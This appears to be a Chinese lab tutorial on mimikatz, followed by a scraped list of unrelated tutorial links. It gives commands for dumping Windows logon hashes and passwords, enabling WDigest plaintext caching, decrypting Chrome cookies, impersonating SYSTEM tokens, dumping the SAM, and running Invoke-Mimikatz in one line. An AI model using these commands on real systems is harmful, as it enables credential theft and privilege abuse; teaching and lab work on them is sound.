mimikatz猕猴桃工具使用教程
实验目标:
1.使用mimikatz提取chrome中保存的cookie2.使用mimikatz的token模块中的命令列出token,模仿system用户token,最后恢复到原来的token3.使用webbrowserpassview和Get-ChromeCreds.ps1获取chrome保存的密码
实验步骤:
1. mimikatz基本使用
以管理员运行后,可以随机打一些字符,进入如下界面
输入aaa::aaa,可展示所有模块:
可采用log命令,保存日志
2. 获取hash与明文用户口令
privilege::debug sekurlsa::logonPasswords
从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows 7/8/2008 R2/2012 需要打 kb2871997 补丁。
这里只抓取到了NTLM
尝试破解1-CMD5
尝试破解2-ophcrack https://www.objectif-securite.ch/ophcrack.php
修改注册表,启用摘要密码支持
需要创建UseLogonCredential,并赋值为1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)
重新登录后,再次运行
3. 使用mimikatz提取chrome中保存的cookie
首先把chrome保存cookie的文件拷贝到桌面上方便操作,这个文件在 C:\users\360sec\appdata\local\google\chrome\user data\default\cookies 命令行下拷贝的命令是: Copy 'C:\users\360sec\appdata\local\google\chrome\user data\default\cookies ' c:\users\360sec\desktop
打开桌面上的mimikatz_trunk文件夹,进入x64文件夹,打开mimikatz.exe
输入dpapi::chrome /in:c:\users\360sec\desktop\cookies /unprotect提取cookie
4. 使用mimikatz的token模块中的命令列出token,模仿system用户token,最后恢复到原来的token
进入mimikatz文件夹,右键mimikatz.exe,选择以管理员身份运行
使用privilege::debug获取debug权限
使用token::elevate模仿system用户的令牌
使用token::list列出令牌
使用 lsadump::sam来获取sam数据库中的密码
使用token::revert恢复令牌
5. 使用webbrowserpassview获取chrome保存的密码
打开桌面上的webbrowserpassview文件夹
打开webbrowserpassview.exe
6. 使用Powershell版Mimikatz
一句话执行
powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"'
mimikatz猕猴桃工具使用教程相关推荐
- 3D游戏设计和创作工具学习教程 3D Game Design Creation Tools
语言:英语+中英文字幕(根据原英文字幕机译更准确) 大小解压后:1.94G 1280X720 mp4 三维游戏设计和创作工具 用扎实的工作流程开始开发游戏 课程获取:3D游戏设计和创作工具学习教程 3 ...
- 服务器硬盘坏道修复教程视频,硬盘坏道修复工具 操作教程
当硬盘出现了坏道,我们该使用什么修复工具来恢复我们的硬盘呢?小编推荐是可以使用DiskGenius修复工具来操作,DiskGenius是一款磁盘分区及数据恢复软件.支持对GPT磁盘(使用GUID分区表 ...
- wandb(wb)(weights and biases): 深度学习轻量级可视化工具入门教程
参考文章:wandb: 深度学习轻量级可视化工具入门教程 这wandb有点蛋疼啊,说登录https://wandb.ai/authorize?signup=true获取API KEY,但貌似要梯子才能 ...
- 【报表技术】IReport 图形化报表开发工具安装教程
[报表技术]IReport 图形化报表开发工具安装教程 JasperReport简单介绍 JasperReport是一个强大.灵活的报表生成工具,能够展示丰富的页面内容,并将之转换成PDF,HTML, ...
- wandb: 深度学习轻量级可视化工具入门教程
本文,就来给大家介绍一款新型的机器学习可视化工具,能够让人工智能研发过程变得更加简单明了. wandb: 深度学习轻量级可视化工具入门教程 引言 wandb 验证数据可视化 自然语言处理 重要工具 极 ...
- 三星s9android recovery,三星S9+刷第三方中文twrp recovery工具和教程
三星S9+手机即使要获得root权限?刷第三方ROM包,那么三星S9+手机要先刷入第三方recovery才行,今天114手机乐园给你们分享一下三星S9+刷入第三方twrp recovery工具和教程. ...
- 版本控制可视化工具-Gource教程
Gource教程 最近Gource在国内稍许有点火,这里稍微介绍一下. 简介 Gource是一个非常美观的版本控制可视化工具,它会将仓库的变化历史用可操作的动画树的形式展现,根目录是衍生动画树的中心, ...
- arcgis python实例_arcgis python脚本工具实例教程—栅格范围提取至多边形要素类
arcgis python脚本工具实例教程-栅格范围提取至多边形要素类 商务合作,科技咨询,版权转让:向日葵,135-4855_4328,xiexiaokui#qq.com 功能:提取栅格数据的范围, ...
- win10硬盘修复工具使用教程
DiskGenius 下载地址https://www.diskgenius.cn/download.php https://baijiahao.baidu.com/s?id=1651410139210 ...
- 发布《Linux工具快速教程》
发布<Linux工具快速教程> 阶段性的完成了这本书开源书籍,发布出来给有需要的朋友,同时也欢迎更多的朋友加入进来,完善这本书: 本书Github地址:https://github.com ...
最新文章
- jdk7新特性学习笔记
- as3(actionScript3.0) 操作摄像头(Camera)实例
- .net中的socket异步通信实现--客户端代码
- 線陣相機處理時間計算方法
- 直接销毁_战机报废,发动机怎么处理?美国直接销毁,中国改造成扫雪神器
- c语言字符串中取最大字符串,使用C语言提取子字符串及判断对称子字符串最大长度...
- 《UNIX环境高级编程 3rd》笔记(1 / 21):UNIX基础知识
- python optimize_Python的五大常用库——numpy,pandas,matplotlib等
- MyBatis学习总结(27)——Mybatis-Plus使用小技巧
- 99.9%的数据分析师,都做不到这些
- java关于map用来筛选的用法
- powerbuilder mysql_powerbuilder+mysql5.0的连接过程
- Auto Layout详解
- Nachos-Lab1-完善线程机制
- U盘文件消失没有被隐藏却占内存的几种解决方案
- 西瓜数据集介绍以及获取。
- IDEA社区版tomcat配置教程
- Java基础学习之函数式编程Comsumer接口(JDK8)
- Easyui后台管理界面设计
- 关于移动端适配的几个方法,快速构建响应式网站必备知识